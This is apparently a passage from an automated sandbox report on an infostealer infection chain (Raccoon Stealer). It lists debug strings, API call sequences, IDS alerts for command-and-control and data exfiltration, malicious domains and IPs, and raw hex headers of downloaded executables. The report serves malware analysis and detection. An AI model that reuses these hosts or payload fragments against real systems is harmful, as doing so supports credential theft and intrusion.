                      Source: Binary string: C:\mubinidefup56_bum.pdb source: OG9rNsihJ7.exe, OG9rNsihJ7.exe, 00000000.00000002.238062965.0000000000401000.00000020.00020000.sdmp, OG9rNsihJ7.exe, 00000000.00000000.231517264.0000000000401000.00000020.00020000.sdmp, OG9rNsihJ7.exe, 00000001.00000000.236309691.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000012.00000000.326118526.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000012.00000002.333467369.0000000000401000.00000020.00020000.sdmp, vfgiwcs, 00000013.00000000.329837112.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000016.00000002.355073966.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000016.00000000.344254452.0000000000401000.00000020.00020000.sdmp, BFBD.exe, 00000018.00000000.351452912.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: Kernel.Appcore.pdbv source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001A.00000003.355300183.0000000003672000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.356247461.0000000003672000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: B1B2.exe, 00000014.00000000.334478486.0000000000413000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.343212792.0000000000413000.00000002.00020000.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: /C:\vofihewakizabu\tesuvahatu\woru.pdbh source: 3136.exe, 0000001D.00000000.359623622.0000000000401000.00000020.00020000.sdmp, 3136.exe, 0000001D.00000002.381021289.00000000008F9000.00000004.00000001.sdmp, xqfkdfcl.exe, 0000002A.00000000.380594981.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: fltLib.pdbr source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdbt source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdbV source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb\ source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbZ source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb" source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbk source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdbura source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: C:\vofihewakizabu\tesuvahatu\woru.pdb source: 3136.exe, 0000001D.00000000.359623622.0000000000401000.00000020.00020000.sdmp, 3136.exe, 0000001D.00000002.381021289.00000000008F9000.00000004.00000001.sdmp, xqfkdfcl.exe, 0000002A.00000000.380594981.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000001A.00000003.355319445.0000000003678000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355100434.0000000003678000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355698589.0000000003678000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: B1B2.exe, 00000014.00000000.334478486.0000000000413000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.343212792.0000000000413000.00000002.00020000.sdmp
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_00419A0C GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C8A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C12E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C14D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C6090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C9930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C9BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C9D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49901 -> 185.163.204.24:80
                      Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.5:49924 -> 74.201.28.62:80
                      Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49940 -> 185.163.204.24:80
                      Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49940 -> 185.163.204.24:80
                      Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49901 -> 185.163.204.24:80
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 40.93.207.0 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.142.143.116 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeDomain query: privacy-tools-for-you-780.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Uses the Telegram API (likely for C&C communication)Show sources
                      Source: unknownDNS query: name: api.telegram.org
                      Performs DNS queries to domains with low reputationShow sources
                      Source: DNS query: c9d0e790b353537889bd47a364f5acff43c11f248.xyz
                      Source: global trafficHTTP traffic detected: GET /book/KB5009812.png HTTP/1.1Host: 74.201.28.62Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:00 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:03 GMTContent-Type: application/x-msdos-programContent-Length: 321024Connection: closeLast-Modified: Fri, 14 Jan 2022 20:05:01 GMTETag: "4e600-5d590516adb4b"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d 1f 39 8a 29 7e 57 d9 29 7e 57 d9 29 7e 57 d9 37 2c c2 d9 33 7e 57 d9 37 2c d4 d9 af 7e 57 d9 0e b8 2c d9 2e 7e 57 d9 29 7e 56 d9 c9 7e 57 d9 37 2c d3 d9 13 7e 57 d9 37 2c c3 d9 28 7e 57 d9 37 2c c6 d9 28 7e 57 d9 52 69 63 68 29 7e 57 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 11 d4 68 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 e8 03 00 00 ac 11 00 00 00 00 00 e0 b5 01 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 15 00 00 04 00 00 31 b6 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 e3 03 00 50 00 00 00 00 00 15 00 28 87 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 15 00 f4 1d 00 00 a0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 4c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 be e6 03 00 00 10 00 00 00 e8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 00 04 00 00 18 00 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 7a 61 66 69 66 00 00 05 00 00 00 00 d0 14 00 00 02 00 00 00 04 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 61 6c 61 64 69 6e ea 00 00 00 00 e0 14 00 00 02 00 00 00 06 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 65 72 00 00 00 00 93 0d 00 00 00 f0 14 00 00 0e 00 00 00 08 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 87 00 00 00 00 15 00 00 88 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5a 46 00 00 00 90 15 00 00 48 00 00 00 9e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:08 GMTContent-Type: application/x-msdos-programContent-Length: 324096Connection: closeLast-Modified: Fri, 14 Jan 2022 20:05:01 GMTETag: "4f200-5d590516c13cb"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d 1f 39 8a 29 7e 57 d9 29 7e 57 d9 29 7e 57 d9 37 2c c2 d9 33 7e 57 d9 37 2c d4 d9 af 7e 57 d9 0e b8 2c d9 2e 7e 57 d9 29 7e 56 d9 c9 7e 57 d9 37 2c d3 d9 13 7e 57 d9 37 2c c3 d9 28 7e 57 d9 37 2c c6 d9 28 7e 57 d9 52 69 63 68 29 7e 57 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e6 17 a5 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 f4 03 00 00 ac 11 00 00 00 00 00 f0 c1 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 15 00 00 04 00 00 eb fe 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 ef 03 00 50 00 00 00 00 10 15 00 28 87 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 15 00 f0 1d 00 00 a0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 4c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ce f2 03 00 00 10 00 00 00 f4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 10 04 00 00 18 00 00 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 75 78 75 74 00 00 05 00 00 00 00 e0 14 00 00 02 00 00 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 69 6a 61 79 75 00 ea 00 00 00 00 f0 14 00 00 02 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 7a 65 6d 6f 79 69 00 93 0d 00 00 00 00 15 00 00 0e 00 00 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 87 00 00 00 10 15 00 00 88 00 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 64 46 00 00 00 a0 15 00 00 48 00 00 00 aa 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:41 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 